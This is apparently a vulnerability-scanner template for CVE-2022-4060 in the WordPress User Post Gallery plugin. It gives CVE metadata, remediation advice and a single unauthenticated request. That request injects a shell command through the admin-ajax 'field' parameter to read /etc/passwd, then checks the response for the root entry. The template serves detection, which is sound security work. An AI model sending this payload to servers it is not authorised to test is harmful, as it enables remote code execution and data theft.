2023-03-05 13:42:10 +00:00
id : CVE-2022-4060
info :
2023-03-27 17:46:47 +00:00
name : WordPress User Post Gallery <=2.19 - Remote Code Execution
2023-03-05 13:42:10 +00:00
author : theamanrawat
severity : critical
description : |
2023-03-27 17:46:47 +00:00
WordPress User Post Gallery plugin through 2.19 is susceptible to remote code execution. The plugin does not limit which callback functions can be called by users, making it possible for an attacker execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2023-09-06 11:59:08 +00:00
remediation : |
Update to the latest version of the User Post Gallery plugin (>=2.20) to mitigate this vulnerability.
2023-03-05 13:42:10 +00:00
reference :
- https://wpscan.com/vulnerability/8f982ebd-6fc5-452d-8280-42e027d01b1e
- https://wordpress.org/plugins/wp-upg/
- https://nvd.nist.gov/vuln/detail/CVE-2022-4060
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-4060
cwe-id : CWE-94
2023-10-22 12:16:24 +00:00
epss-score : 0.37849
2023-11-05 22:23:39 +00:00
epss-percentile : 0.96783
2023-09-06 11:59:08 +00:00
cpe : cpe:2.3:a:odude:user_post_gallery:*:*:*:*:*:wordpress:*:*
2023-03-05 13:42:10 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 11:59:08 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : odude
product : user_post_gallery
2023-09-06 11:59:08 +00:00
framework : wordpress
2023-03-05 14:19:20 +00:00
tags : unauth,wpscan,cve2022,rce,wordpress,wp-plugin,wp,cve,wp-upg
2023-03-05 13:42:10 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-05 13:42:10 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=upg_datatable&field=field:exec:head+-1+/etc/passwd:NULL:NULL"
matchers-condition : and
matchers :
- type : word
part : header
words :
- "application/json"
- type : word
part : body
words :
- "recordsFiltered"
2023-07-11 19:49:27 +00:00
- type : regex
part : body
regex :
- "root:.*:0:0:"
2023-03-05 13:42:10 +00:00
- type : status
status :
- 200
2023-11-05 22:23:39 +00:00
# digest: 4a0a004730450220274d126c9b8e88d6a77a3ff6d5f5097c3058835d439311310eecf16f224407ba022100a73c8f14c6417125946216728f0e199cc0bdcd7baeb819a80927f00d106d7a34:922c64590222798bb761d5b6d8e72950